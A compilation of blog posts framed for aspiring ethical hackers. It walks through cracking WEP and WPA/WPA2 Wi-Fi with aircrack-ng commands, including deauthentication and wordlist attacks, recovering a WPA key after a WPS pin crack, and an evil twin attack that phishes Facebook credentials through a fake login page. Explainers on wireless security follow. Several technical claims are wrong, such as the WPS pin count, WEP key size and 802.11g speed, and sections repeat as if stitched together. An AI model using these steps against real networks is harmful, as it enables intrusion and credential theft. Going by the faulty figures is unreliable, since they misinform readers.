Posted on

Aircrack-ng: Complete guide to beginners

Hello, aspiring ethical hackers. In our previous blogpost, you learnt what is Wifi hacking and different techniques to hack wireless networks. In most of these hacking techniques, a tool named aircrack plays a very important role.

In this blogpost, you will learn about this tool. Aircrack-ng or aircrack ng is a complete suite of tools used to test wi-fi network security. The various functions of aircrack include,

  1. Monitoring: It can be used to capture wireless packets and save data in text file which can be processes by third party tools.
  2. Attacking: We can use it too perform various wireless attack like Replay attacks, DE authentication access points and other attacks.
  3. Testing: Checking Wi-Fi cards and capability of the drivers. (capture and injection)
  4. Cracking: For cracking WEF and WPA PSK (WPA 1 and WPA 1) passwords.

Just now, we have learnt that aircrack-ng is a combination of tools. Let’s understand what those tools are and what are they used for.

1. airbase-ng:

It is a multi purpose tool that can be used to attack the Wi Fi client instead of the Wi Fi access point.

2. airdecap-ng:

With this tool, you can decrypt WEP/WPA/WPA2 capture files. It is also used to remove the wireless headers from an unencrypted wireless capture.

3. aircrack-ng:

It is key cracking program.

4. airdecloak-ng:

Some wireless Intrusion Prevention System (WIPS) prevent WEP from being cracked by using fake WEP frames. This tool removes the WEP cloaking frame a captured pcap file.

5. airdrop-ng:

airdrop-ng is a program used to de authenticate users from access points. It uses rule based de authentication techniques that can be MAC address, type of hardware, etc.

4. aireplay-ng:

This tool is used to inject frames. It is used to generate traffic which can be used later by aircrack-ng for WEP and WPA-PSK key cracking.

5. airmon-ng:

It is used to enable monitor mode on wireless interfaces.

6. airodump-ng:

This tool is used to capture raw 802.11 packets. It is used particularly for collecting WEP IVS or WPA handshakes to crack later with aircrack.

7. airolib-ng:

This is a tool designed to store and manage ESSID and password lists. calculate their Pairwise Master Keys (PMK’s) and use them in WPA/WPA2 cracking.

8. airtun-ng:

This tool creates a virtual tunnel interface. It has two basic functions. They are, allowing all encrypted traffic to be monitored for wireless interface detection system (WIDS) and injecting arbitrary traffic into a network.

9. Besside-ng:

It is used to automatically crack WEP and WPA networks . See how to automatically crack WEP and WPA networks with Besside. Learn more about it .

10. dcrack-ng:

dcrack is used to distribute WPA2 / PSK cracking process across multiple servers.

11. easside-ng:

This tool is a magic tool that allows you to communicate with a WEP access point without knowing its WEP key.

12. packetforge-ng:

This tool is used to create encrypted packets to be used for packet injection. Using this tool, we can create various types of packets like ARP requests, UDP, ICMP and custom packets.

13. tkiptun-ng:

This tool is used to inject a few frames into a WPA TKIP network.

14. wesside-ng:

Wesside-ng is another auto-magic tool that uses a variety of techniques to get the WEP key.

    Cracking WEP passwords with aircrack

    Let’s see how to crack WEP passwords with aircrack. All wifi hacking attacks require a wireless adapter that supports packet injection. For this tutorial, I am using ALFA Wireless USB adapter. My attacker machine is Kali Linux which is installed on VMware. So I first connected the ALFA wireless adapter to my laptop and make sure it is connected to the Kali Linux virtual machine. Now, I open a terminal in Kali Linux and type command shown below that shows all the wireless interfaces connected to the machine.

    iwconfig
    

    Then I start monitor mode on the wireless interface. Monitor mode is just like promiscuous mode on wired interfaces. When in monitor mode, the wireless adapter sniffs on all the wireless traffic around.

    I once again run the “iwconfig” command to have a look at the wireless interfaces to confirm monitor mode started on the Wireless interface.

    As you can see the name of the wireless interface changed from waln0 to wlan0mon. The monitor mode is on. To see all the traffic being observed by the wireless interface, I run the command airodump-ng on the wireless interface.

    how to crack wep with aircarck

    As you can see, this shows all the wireless traffic around us. There are many wireless networks available but my target is the Wi-Fi Access point I named “Hack_Me_If_You_Can”. I use the same airodump-ng to target the MAC address of target’s Access point and route all the traffic it has to a file named wep_hc_crack.

    In the above image, you can see the clients connected to the targeted Wi-Fi Access point. All the traffic belonging to the Wi-Fi access point “Hack_Me_If_You_Can” will be saved in the file “wep_hc_crack.cap”. What I am looking for is the initialization vectors that are useful in cracking WEP. This initialization vectors play a key role in cracking the password of any WEP enabled Wi-Fi access point.

    Just remember the more IV’s we have, the more the chances of cracking the WEP password. Since I need more traffic to crack the WEP password fast, I can use some tricks to create more traffic. A feature of aircrack-ng, aireplay-ng helps us to create more traffic. It has various methods of creating additional traffic. One such method is ARP request replay attack.

    The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a ne- w IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key. This attack can be started as shown below.

    where “-h” option is used to specify the MAC address of any client we want to use. Here is another way in which you can start the ARP replay attack.

    As initialization vectors start collecting in the wep_hc_crack file, I can use aircrack to try cracking the password. The command is “aircrack-ng wep_hc_crack.cap“.

    If the initialization vectors are too less (in this case I have a new 20) aircrack wait for enough initialization vectors. I continue the ARP request replay attack until traffic increases.

    You can see the traffic increasing. All have to do is play the game of patience now .

    After collecting almost 25000 IV’s aircrack finally cracked the WEP password. The password of the Wi-Fi access point is 1234567899. It’s a 64bit hexadecimal key. As you can see, it took me around one hour thirty five minutes for me to crack the password.

    Cracking WPA / WPA2 passwords with aircrack

    Now, let’s see how to crack WPA / WPA2 with aircrack. WPA stands for Wifi Protected Access. It is an encryption system to secure WLAN networks. It eliminates all known vulnerabilities in WEP(Wired Equivalent Privacy). WPA uses 128 bit key and 48 bit initialization vector while WEP uses 108 bit key with 24 bit initialization vector. WPA2 is the successor of WPA. Both WPA and WPA2 use temporal key integrity protocol(TKIP) for encryption and pre-shared key(PSK) authentication. The only difference between WPA and WPA2 is that they use Rivest Cipher(RC4) and Advanced Encryption Standard(AES) encryption algorithms respectively. Both can be configured to use counter cipher block chaining mode(CCM) though. They are by far considered most secure for Wifi networks.

    I am using the same arrangement I used for cracking WEP above. So let’s start. Once you have booted into Kali Linux, open terminal and type command “iwconfig”. It lists your wireless interfaces just like ifconfig shows wired interfaces.

    We can see that we have a wireless interface wlan0. Now we are going to start monitor mode on our wireless interface. Monitor mode is same as promiscuous mode in wired sniffing. Type command shown below. We can see below that monitor mode has been enabled on “mon0″.

    airmon-ng start wlan0
    

    Now let’s see all the traffic collected by our wireless interface. Type command airodump-ng mon0.

    Hit Enter. We can see all the wireless networks available as shown below.

    crack wpa

    We can see that all the wifi networks are configured with WPA2 or WPA. We are going to hack the network “shunya”. We will collect the shunya’s network traffic into a file. Open a terminal and type command “airodump-ng –bssid <Mac address of wifi access point> -c 13 –write wpacrack mon0″.

    where

    • –bssid stands for base station security identifier
    • <MAC address> is the Mac address of access point.
    • -c is used to specify the channel the wifi network is operating on.
    • –write to write to a file.
    • “wpacrack” is the file name we are writing into.
    • mon0 is the interface.

    Hit Enter. We will see the result as below.

    We can only hack a WPA/WPA2 protected Wifi network by capturing its handshake process or association( when the client is trying to connect to the wifi network.). So let’s try to disconnect all the clients connected to the wireless network “shunya” first. Open a new terminal and type the command

    aireplay-ng –deauth 100 -a <MAC> –ignore-negative-one mon0
    

    where

    –deauth are the de authentication packets,

    100 are the number of de authentication packets we want to send.

    -a stands for access point.

    <MAC> is the MAC address of the wireless access point.

    This command will send 100 de authentication packets to the broadcast address of the wireless access point. This will make all the clients connected to the “shunya” get disconnected. As soon as this happens, all the clients will try to connect back to the wireless network once again. We can see that a WPA handshake has happened in the previous terminal.

    Now let’s see where our capture file is located. Type “ls”. We will do dictionary password cracking here. So let’s find out where the dictionaries are. Type commandlocate wordlists”. This will show us a number of wordlists available by default in Kali Linux.

    Our captured traffic is stored in .cap file. We will use the wordlist big.txt for cracking the password. Open a new terminal and type command

    aircrack-ng wpacrack-01.cap -w /usr/share/dirb/wordlists/big.txt 
    

    Hit Enter. If our dictionary or wordlist has this password, the result will be as below. If our dictionary doesn’t have the password, we have to use another dictionary or wordlist.

    Remember that the choice of dictionary or wordlist will play a key role in WPA/WPA2 password cracking. So that is one way in which we crack wpa wpa2 password with aircrack for you. Hope this was helpful. Learn how to crack WPA WPA2 with Fern Wifi cracker.

    Posted on

    WPS pin is cracked but WPA key is not shown

    Hello aspiring ethical hackers. In this article, you will learn how to solve a problem that you experience while cracking WPS pin. We have seen how to retrieve WPA key by cracking WPS pin with both Bully and Wifite. Well, If you get WPA key as soon as you crack WPS pin, you are lucky. However, sometimes the WPS pin is cracked but the WPA-PSK key is not shown. For example, see the image below.

    In the above image, we can clearly see that the Wifite cracked WPS pin successfully but failed to get the WPA key. To get the WPA key in such cases, open a new terminal and type the command shown below.

    sudo systemctl stop NetworkManager

    Then using your favorite text editor open the file wpa_supplicant.conf located in /etc directory.

    You should see the contents of the file as shown below.

    If there is any data more than this, delete it and just leave the above three lines. Then, run the command shown below.

    sudo wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf

    Leave this terminal open and open another new terminal window and run the command as shown below.

    sudo wpa_cli

    It goes into interactive mode.

    While interactive mode is active, type the following command as shown below.

    status

    Many events will take place but what we are looking for is an event that says “connected”. Once that happens, check the wpa_supplicant.conf file and you should be seeing WPA-PSK key of the wireless network as shown below.

    wps pin
    Posted on

    Evil Twin Attack

    Hello aspiring ethical hackers. In this article, you will learn about Evil Twin Attack. Till now in our blog, readers have learnt about various wireless hacking tutorials like cracking WEP, cracking WPA/WPA2 and cracking WPS. Almost all of these hacking methods involved brute forcing or password cracking. What if there was another easier way to hack wireless networks without the need of brute forcing.

    Well, Evil Twin Attack is one such attack. An evil twin attack is a wireless attack in which a fake Wi-Fi access point is set up with the same SSID as that of the original one. This fake access point appears to be legitimate but is actually set up to eavesdrop on wireless communications of the original one. The evil twin is the wireless LAN equivalent of the phishing scam.

    Since it has the same name, it’s called twin and as it is malicious it can be termed Evil Twin. The aim of this attack is to confuse users trying to connect to the target Wi-Fi network and make them connect to the Evil Twin instead and thus capture sensitive data. Let’ s see it practically. There are many tools that can be used for this attack but let’s use a tool called Wifiphisher because it’s the simplest one. Our Attacker system is Kali Linux. Wifiphisher can be installed on Kali Linux as shown below.

    Once installation is finished, Wifiphisher can be started using command.

    sudo wifiphisher

    Then the tool will prompt you to select the Wi-Fi Access Point of which you want to create an Evil twin.

    For this tutorial as always (OK, most of the time) I will select the Wi-Fi network “Hack_Me_If_You_Can” as my target.

    The tool will prompt you the available phishing scenarios available. For this case, OAuth Login Page attack is available.

    The OAuth Login Page attack creates a fake login page asking for credentials of the users who want to connect. Note that while creating a fake access point, it is created as an open network unlike the one we are targeting. I select the OAuth Login Page attack and the attack starts.

    So just imagine while we are running this Fake access point, some mobile user is looking for available Wi-Fi networks to connect to. He will see two networks with the same name and gets confused. Once he selects our Evil Twin to connect to, he will be prompted with a login page as shown below.

    evil twin attack

    Here, he is being asked to submit his Facebook credentials of course by dangling the carrot of free internet. The login page is so believable even to me. And if the user falls for the trick (or carrot) and submits his credentials as shown below.

    On Kali Linux, the activity is recorded as shown below.

    and the credentials are captured successfully.

    That looked simple enough. But where can Evil Twin Attack become successful? In many areas but especially where there are free Wi-Fi access points. Imagine creating an Evil twin with the same name as the original.

    Posted on

    Understanding Wireless Security : Part 2

    Hello aspiring ethical hackers. Welcome to the second part of understanding Wireless security. In Part 1, readers have learnt about the history of WiFi, terminology used in WiFi and WEP security and its weakness. So, let’s continue from there. Responding to the serious weaknesses in WEP encryption security, the Wi-Fi Alliance introduced Wi-Fi Protected Access (WPA) to secure wireless networks. However, the Wi-Fi Alliance intended WPA as an interim measure to take the place of WEP before they bring in Wi-Fi Protected Access 2 (WPA 2).

    Wi – Fi Protected Access (WPA)

    Also known as Temporal Key Integrity Protocol (TKIP) standard, WPA implements the TKIP encryption method and was introduced in 2003. TKIP introduced three new methods to overcome weaknesses in Wired Equivalent Privacy (WEP) standard.

    1. TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 cipher initialization. WEP on the other hand merely concatenated the initialization vectors to the root key and passed this value to the RC4 cipher.

    2. A sequence counter is implemented to protect against replay attacks. Hence, packets received out of order will be rejected by the Access point.

    3.TKIP implements a 64-bit Message Integrity Check (MIC) replacing Cyclic Redundancy Check (CRC) used in WEP. This re-initializes the sequence number each time when a new key (Temporal Key) is used.

    Wi – Fi Protected Access (WPA) 2

    WPA 2 was introduced in 2004 to replace WPA. It implemented the mandatory elements of IEEE 802.11i. 802.11i makes use of the Advanced Encryption Standard (AES) block cipher instead of RC4 stream cipher used by both WEP and WPA. It also uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) encryption protocol. It provides the following security services.

    1. Data Confidentiality: It ensures only authorized parties can access the information

    2. Authentication: provides proof of genuineness of the user

    3. Access control in conjunction with layer management.

    Wi – Fi Protected Access 3 (WPA 3)

    The Wi-Fi Alliance announced WPA3 as a replacement to WPA2 in 2018. The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode (AES-256 in GCM mode with SHA-384 as HMAC) and still mandates the use of CCMP-128 (AES-128 in CCM mode) as the minimum encryption algorithm in WPA3-Personal mode.
    The WPA3 standard also replaces the pre-shared key (PSK) exchange with Simultaneous authentication of Equals (SAE) exchange, a method originally introduced with IEEE 802.11s. This results in a more secure initial key exchange in personal mode and forward secrecy.

    WPA – Versions

    There are two versions of WPA. They are,

    • A. WPA- Personal
    • B. WPA – Enterprise

    WPA – Personal

    Wi-Fi Protected Access (WPA) – Personal is designed for home and small office networks. This version uses Pre- Shared Key (PSK) and hence it is also referred as WPA-PSK (pre-shared key) mode. The network traffic is encrypted using a 128-bit encryption key derived from a 256-bit shared key. WPA-Personal mode is available on all three WPA versions.

    WPA – Enterprise

    As its name implies, this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup but provides additional security like protection against dictionary attacks on short passwords. Various kinds of the Extensible Authentication Protocol (EAP) are used for authentication. WPA-Enterprise mode is available on all three WPA versions.

    Weakness Of WPA/WPA2

    1. Pre-shared key WPA and WPA2 remain vulnerable to password cracking attacks if users rely on a weak password or passphrase.

    2. WPA passphrase hashes are seeded from the SSID name and its length; rainbow tables exist for the top 1,000 network SSIDs and a multitude of common passwords, requiring only a quick lookup to speed up cracking WPA-PSK

    Brute forcing of simple passwords can be attempted using the Aircrack Suite starting from the four-way authentication handshake exchanged during association or periodic re-authentication. In this article, readers have seen how WPA password was cracked. One important feature of cracking WPA /WPA2 is that we don’t need a lot of traffic to crack it. We just need one client connected to the Wi-Fi Access point. Then we de authenticate it from the Wi-Fi Access point. The client automatically tries to connect to the Wi-Fi access point again.

    It is at this stage, we try to capture the WPA handshake. If you have noticed, while using aircrack, to crack the password, we supplied a dictionary or wordlist. While cracking WEP we didn’t.

    So what is a weak password? Any password that is part of a dictionary or wordlist can be called a weak password in WPA. Otherwise, WPA /WPA2 is considered secure. WPA3 replaces cryptographic protocols susceptible to off-line analysis with protocols that require interaction with the infrastructure for each guessed password, supposedly placing temporal limits on the number of guesses. However, design flaws in WPA3 enable attackers to plausibly launch brute-force attacks.

    Wi-Fi Protected Setup (WPS)

    In year 2007, the Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS). The main feature of this protocol is to allow home users who have little knowledge about wireless security to set up Wi-Fi Protected Access (For some users, accessing the router dashboard and setting passwords can be too complex). It also makes it easy to add new devices to an existing Wireless network without entering long passphrases. WPS also allows the owner of Wi-Fi privileges to block other users from using their household Wi-Fi. There are two common methods to use WPS.

    • PIN Method.
    • Push Button Method.

    PIN Method

    Every Wireless Router with WPS enabled has a PIN on the Wi-Fi Router (which is usually printed on a sticker). This PIN must then be entered into any new device that wants to connect to this Wireless network. No need of memorizing any password.

    Push Button Method

    In this method, the user has to PUSH a WPS button on both the Access point and the new wireless client device. On most devices, this discovery mode turns itself off as soon as a connection is established or after a delay (typically 2 minutes or less), whichever comes first, thereby minimizing its vulnerability.
    Although WPS was introduced to simplify Wi-Fi Connection issues, it suffers from a major vulnerability. Any remote attacker can recover the WPS pin in a few hours by using brute force attack. Once he does this, he can easily recover WPA/WPA2 key also. Nowadays, all recent models of Wireless Routers have WPS enabled by default. It is wise to turn off WPS PIN feature although this is not possible on many routers.
    WPS is widely understood to have added insecurity to otherwise secure WPA/WPA2. WPS pin is a 8 digit PIN that is required by clients to connect to the Wireless Router. The Wireless Router instead of checking the entire 8 digit PIN at once, checks the first four digits initially and then checks the last four digits. This makes brute forcing WPS PINs very easy.
    This is because there are only 11,000 possible 4 digit pins and once the brute force software gets the first 4 digit pin right, the attacker can move on to cracking the latter 4 digit pin.
    Tools Bully and Reaver are first to come to mind when we want to crack WPS pin. However, in our latest tests, both the tools are presenting some problems. You can read our previous articles on Bully and Wifite.

    That was a complete guide to understanding wireless security. Hope our readers now have a better understanding of Wireless security. You can read Part 1 of Understanding Wireless security here. Happy hacking.

    Posted on

    WiFi hacking: complete guide for beginners

    Hello aspiring ethical hackers. In this blogpost, we bring you the complete guide to WiFi hacking. WiFi hacking or wireless hacking is compromising of the wireless networks. Before going deep into hacking wireless networks, let us give you a brief history of Wi–Fi.

    History of Wi-Fi

    Wi-Fi is the name given to a family of wireless network protocols, based on the IEEE 802.11 family of standards. These are commonly used for local area networking of devices and also for Internet access. Simply put, this allows nearby digital devices to exchange data using radio waves. No need to mention what these devices are.

    The beginning of Wi – Fi happened in the form of ALOHAnet which successfully connected the Great Hawaiian Islands with a UHF wireless packet network in 1971. ALOHA net and the ALOHA protocol in fact were precursors of Ethernet and 802.11 protocols.

    After another 14 years, in 1985 a ruling by the U.S. Federal Communications Commission released the band for unlicensed use. These frequency bands are the 2.4 gigahertz (120 mm) UHF and 5 gigahertz (60 mm) SHF radio bands. These frequency bands are the same ones used by equipment such as microwave ovens, wireless devices etc.

    The first version of the 802.11 protocol was released in year 1997 and provided speed up to 2 Mbit/s. The 802.1a came as an improvement over the original standard. It operates in 5 GHz band, uses a 52-subcarrier orthogonal frequency-division multiplexing (OFDM) and has speed of mid 20 Mbit/s. This was replaced with 802.11b protocol in 1999 and this had 11 Mbit/s speed. It is this protocol that would eventually make Wi -Fi popular.

    In the same year, a non-profit association named Wi-Fi Alliance was formed which restricted the use of the term Wi-Fi Certified to products that successfully complete interoperability certification testing. By 2017, the Wi-Fi Alliance had more than 800 companies from around the world and shipped over 3.05 billion Wi-Fi enabled devices by year 2019.
    The first devices to use Wi-Fi connectivity were made by Apple which adopted this option in their laptops. 802.11g was adopted to the 802.11 specification in year 2003. It operated in the 2.4 GHz microwave band and provided speed upto 11 Mbit/s. Another standard was adopted in year 2008, named 802.11n which operated in both 2.4 and 5 GHz and had a linkrates 72 to 600 Mbit/s. This standard was also known as WI-Fi 4.

    Similarly, 802.11ac, 802.11ax and standards were also adopted later which further improved speed and performance of Wi -Fi. Now, let us learn about some terms that frequently occur regarding wireless.

    Basic terminology Of Wi-Fi hacking

    Wireless Access Point (WAP): A Wireless Access Point (WAP), commonly known as Access Point (AP) is a networking hardware device that allows other Wi-Fi devices to connect to it. This Access Point allows wireless devices to connect to wired devices and generally provides internet. Mostly the Access Point is a Wi -Fi Router.

    Wireless Client: A Wireless Device that connects to the Wireless Access Point to access internet is known as a Wireless Client. Ex : all the devices that connect to a Wi- Fi Router.

    Wireless Local Area Network (WLAN) : The Computer Network comprising of the Wireless Access Point and two or more Wireless Clients is known as Wireless Local Area Network. This is a LAN but without wires.

    Service Set Identifier (SSID) : A Service Set Identifier (SSID) is the name of the Wireless network. Normally, it is broadcast in the clear by Wireless Access Points in beacon packets to announce the presence of a Wi -Fi network. The SSIDs can be up to 32 octets (32 bytes) long. For example, SSID in our first wireless hacking article is “Hack_Me_If_You_Can”.

    Extended Service Set Identifier (ESSID): An Extended Service Set Identifier (ESSID) is a wireless network created by multiple access points. This is useful in providing wireless coverage in a large building or area in which a single Access Point (AP) is not enough. However, this appears as a single seamless network to users. The name is same as SSID.

    Basic Service Set Identifier (BSSSID): Previously our readers learnt that every hardware device in computing is hardcoded with a MAC Address. A BSSID is the MAC address of the Access Point.

    Channels: Readers have learnt that Wi- Fi operates in the frequency range of 2.5GHz and 5GHz. These frequency bands are divided into smaller frequency bands which are known as channels. Usually, these channels are of width 20MHz. The 2.5 GHz range is divided into 14 channels each spaced 5Mhz apart to avoid interference and disturbance. Similarly, The 5GHz band is divided into 24 channels.

    In our First wireless hacking attack, the channel of our Access Point is 1.

    Beacons: Beacons are one of the management frames in IEEE 802.11 based WLANs. A Beacon Frame contains all the information about the network and is transmitted periodically to announce the presence of a wireless LAN and to synchronize the members of the WLAN.

    Signal Strength : Wi-Fi signal strength refers to the strength of the Wi-Fi network connection. The correct way to express Wi-Fi signal strength is mW but it is also very complex. So for simplicity, the signal strength is expressed in as dBm, which stands for decibels relative to a milliwatt.

    dBm works in negatives. For example, change the values here. -34 is a higher signal than -64 or -94 because -80 is a much lower number.

    Data: Data needs no explanation.

    Encryption: Encryption refers to the Wi fi Encryption protocol used for security. There are three types of wireless encryption protocols at present. Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), and Wi-Fi Protected Access Version 2 (WPA2). More about them soon.

    Authentication: The authentication method used by wireless clients to authenticate with wireless access point. More about it soon too.

    Cipher : Ciphers are standard security. ciphers are part of Wi-FI security to enhance the security of wireless networks. Example WPA can use either CCMP or TKIP ciphers.

    Various Wireless threats

    1. Wardriving

    Wardriving is searching for publicly accessible Wi-Fi networks. Publicly accessible networks or open Wi-Fi networks are those wireless networks that are configured without any passwords. Since this attack is usually performed while driving, it is known as war driving. The term War driving originated from the term wardialing, the method which was popularized by a character played by Matthew Broderick in the film WarGames. There are other variants of Wardriving like Warbiking, Warcycling and Warwalking which are similar to wardriving but use other modes of transportation.

    2. Password attacks

    Just now, you have read that, Wi-Fi networks can be configured without a password. This is dangerous in real-world. So, in real world, Wi-Fi networks are usually secured using a password. Only those users who are authorized to use the Wi-Fi are provided with a password using which they can connect. Here are the types of Wireless security protocols that can be used to secure the WiFi network.

    1. Wired Equivalent Privacy (WEP)
    2. Wi-Fi Protected Access (WPA)
    3. Wi-Fi Protected Access 2 (WPA2)
    4. Wi-Fi Protected Access 3 (WPA3)

    Let’s learn about each of these security protocols and how they are cracked in detail.

    Wired Equivalent Privacy (WEP)

    Wired Equivalent Privacy (WEP) is the first security algorithm for IEEE 802.11 wireless networks that was introduced as part of the original 802.11 standard ratified in 1997. As its name implies, the intention was to provide data confidentiality equivalent to that of a traditional wired network. WEP was the only encryption protocol available to 802.11a and 802.11b devices as these were built before the WPA standard was released. WEP was ratified as a Wi-Fi security standard in 1999. The first versions of WEP used only 64-bit encryption as U.S.A restricted export of cryptographic technology.

    WEP uses the Rivest Cipher 4 (RC4) for confidentiality and the Cyclic Redundancy Check (CRC) 32 checksum for integrity. RC4 is a stream cipher known for simplicity and speed. Standard 64-bit WEP uses a 40 bit key which is concatenated with a 24-bit initialization vector (IV, remember something) to form the RC4 key. A 64-bit WEP key usually has a string of 10 hexadecimal (base 16) characters (0–9 and A–F). See Image below.

    Each character in the key represents 4 bits. 10 digits of these 4 bits each give 40 bits. When we add 24-bit Initialization Vector to this 40 bits, complete 64-bit WEP key is produced. Some devices also allow the user to enter the key as 5 ASCII characters (0–9, a–z, A–Z), each of which is turned into 8 bits using the character’s byte value in ASCII. However, this restricts each byte to be a printable ASCII character, which is only a small fraction of possible byte values, greatly reducing the possible keys. After USA lifted restrictions on export of cryptographic technology, 128bit WEP key came into existence.

    Each digit is of 4 bits. 26 digits of these 4 bits each give 104 bits. When we add a 24-bit IV to this 104 bits produced the complete 128-bit WEP key. Most devices allowed the user to enter 13 ASCII characters as WEP key.

    understanding wireless security

    Although some vendors made 152-bit and 256-bit WEP systems also available, 128 bit WEP was widely used.

    Authentication System of WEP:

    WEP uses two methods of authentication. They are,

    1. Open System Authentication:

    In Open System authentication, the WLAN client that wants to connect to a Access Point doesn’t need any credentials during authentication. Simply put, no authentication occurs. Subsequently, WEP keys are used for encrypting data frames. At this point, the client needs to have correct WEP key.

    2. Shared Key Authentication:

    In Shared key authentication, authentication takes place in a four-step challenge-response handshake :

    Step 1: The client sends an authentication request to the Access Point.
    Step 2: The Access Point replies with a clear-text challenge.
    Step 3: The client encrypts the challenge-text using the configured WEP key and sends it back in another authentication request.
    Step 4: The Access Point decrypts the response. If this matches the challenge text, the Access Point sends back a positive reply.

    After the authentication and association is successful, the pre-shared WEP key is also used for encrypting the data frames using RC4. Although Shared Key Authentication appears secure than Open System Authentication, it is actually vice versa.

    How to crack WEP passwords:

    WEP uses RC4 which is a stream cipher. Hence the same traffic key cannot be used twice. It is due to this purpose that WEP uses Initialization Vectors (IVs). But the problem is WEP uses 24 bit IVs for both 64 bit and 128 bit key. This 24bit IV is not long enough to ensure non-repetition on a busy network. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5,000 packets. So WEP key in a busy network can be easily cracked since it has lot of traffic.

    Attackers can even create fake connections ( to generate more traffic and then crack the WEP key. As we have seen in this article, the more IVs we captured the faster it is to crack WEP and it usually takes only minutes to crack the WEP key with besside-ng tool. That’s all in our Part 1 of Understanding wireless security. In Part 2 of this article, readers will learn about WPA / WPA2.

    Wi-Fi Protected Access (WPA)

    Also known as Temporal Key Integrity Protocol (TKIP) standard, WPA implements the TKIP encryption method and was introduced in 2003. TKIP introduced three new methods to overcome weaknesses in Wired Equivalent Privacy (WEP) standard.

    1. TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 cipher initialization. WEP on the other hand merely concatenated the initialization vectors to the root key and passed this value to the RC4 cipher.
    2. A sequence counter is implemented to protect against replay attacks. Hence, packets received out of order will be rejected by the Access point.
    3.TKIP implements a 64-bit Message Integrity Check (MIC) replacing Cyclic Redundancy Check (CRC) used in WEP. This re-initializes the sequence number each time when a new key (Temporal Key) is used.

    Wi-Fi Protected Access 2 (WPA2)

    WPA 2 was introduced in 2004 to replace WPA. It implemented the mandatory elements of IEEE 802.11i. 802.11i makes use of the Advanced Encryption Standard (AES) block cipher instead of RC4 stream cipher used by both WEP and WPA. It also uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) encryption protocol. It provides the following security services.

    1. Data Confidentiality: It ensures only authorized parties can access the information.
    2. Authentication: provides proof of genuineness of the user
    3. Access control in conjunction with layer management.

    WPA – versions:

    There are two versions of WPA. They are,

    1. WPA – Personal:

    Wi-Fi Protected Access (WPA) – Personal is designed for home and small office networks. This version uses Pre- Shared Key (PSK) and hence it is also referred as WPA-PSK (pre-shared key) mode. The network traffic is encrypted using a 128-bit encryption key derived from a 256-bit shared key. WPA-Personal mode is available on all three WPA versions.

    2. WPA – Enterprise:

    As its name implies, this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup but provides additional security like protection against dictionary attacks on short passwords. Various kinds of the Extensible Authentication Protocol (EAP) are used for authentication. WPA-Enterprise mode is available on all three WPA versions.

    How to crack WPA/WPA2 passwords:

    1. Pre-shared key WPA and WPA2 remain vulnerable to password cracking attacks if users rely on a weak password or passphrase.
    2. WPA passphrase hashes are seeded from the SSID name and its length; rainbow tables exist for the top 1,000 network SSIDs and a multitude of common passwords, requiring only a quick lookup to speed up cracking WPA-PSK

    Brute forcing of simple passwords can be attempted using the Aircrack Suite starting from the four-way authentication handshake exchanged during association or periodic re-authentication. In this article, readers have seen how WPA password was cracked. One important feature of cracking WPA /WPA2 is that we don’t need a lot of traffic to crack it. We just need one client connected to the Wi-Fi Access point. Then we de authenticate it from the Wi-Fi Access point. The client automatically tries to connect to the Wi-Fi access point again.

    It is at this stage, we try to capture the WPA handshake. If you have noticed, while using aircrack, to crack the password, we supplied a dictionary or wordlist. While cracking WEP we didn’t.

    So what is a weak password? Any password that is part of a dictionary or wordlist can be called a weak password in WPA. Otherwise, WPA /WPA2 is considered secure. WPA3 replaces cryptographic protocols susceptible to off-line analysis with protocols that require interaction with the infrastructure for each guessed password, supposedly placing temporal limits on the number of guesses. However, design flaws in WPA3 enable attackers to plausibly launch brute-force attacks.

    Wi-Fi Protected Access 3 (WPA3)

    The Wi-Fi Alliance announced WPA3 as a replacement to WPA2 in 2018. The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode (AES-256 in GCM mode with SHA-384 as HMAC) and still mandates the use of CCMP-128 (AES-128 in CCM mode) as the minimum encryption algorithm in WPA3-Personal mode.
    The WPA3 standard also replaces the pre-shared key (PSK) exchange with Simultaneous authentication of Equals (SAE) exchange, a method originally introduced with IEEE 802.11s. This results in a more secure initial key exchange in personal mode and forward secrecy.

    Wi-Fi Protected Setup (WPS)

    In year 2007, the Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS). The main feature of this protocol is to allow home users who have little knowledge about wireless security to set up Wi-Fi Protected Access (For some users, accessing the router dashboard and setting passwords can be too complex). It also makes it easy to add new devices to an existing Wireless network without entering long passphrases. WPS also allows the owner of Wi-Fi privileges to block other users from using their household Wi-Fi. There are two common methods to use WPS.

    1. PIN method:

    Every Wireless Router with WPS enabled has a PIN on the Wi-Fi Router (which is usually printed on a sticker). This PIN must then be entered into any new device that wants to connect to this Wireless network. No need of memorizing any password.

    2. Push Button method:

    In this method, the user has to PUSH a WPS button on both the Access point and the new wireless client device. On most devices, this discovery mode turns itself off as soon as a connection is established or after a delay (typically 2 minutes or less), whichever comes first, thereby minimizing its vulnerability.

    How to crack WPS pin:

    Although WPS was introduced to simplify Wi-Fi Connection issues, it suffers from a major vulnerability. Any remote attacker can recover the WPS pin in a few hours by using brute force attack. Once he does this, he can easily recover WPA/WPA2 key also. Nowadays, all recent models of Wireless Routers have WPS enabled by default. It is wise to turn off WPS PIN feature although this is not possible on many routers.
    WPS is widely understood to have added insecurity to otherwise secure WPA/WPA2. WPS pin is a 8 digit PIN that is required by clients to connect to the Wireless Router. The Wireless Router instead of checking the entire 8 digit PIN at once, checks the first four digits initially and then checks the last four digits. This makes brute forcing WPS PINs very easy.
    This is because there are only 11,000 possible 4 digit pins and once the brute force software gets the first 4 digit pin right, the attacker can move on to cracking the latter 4 digit pin.
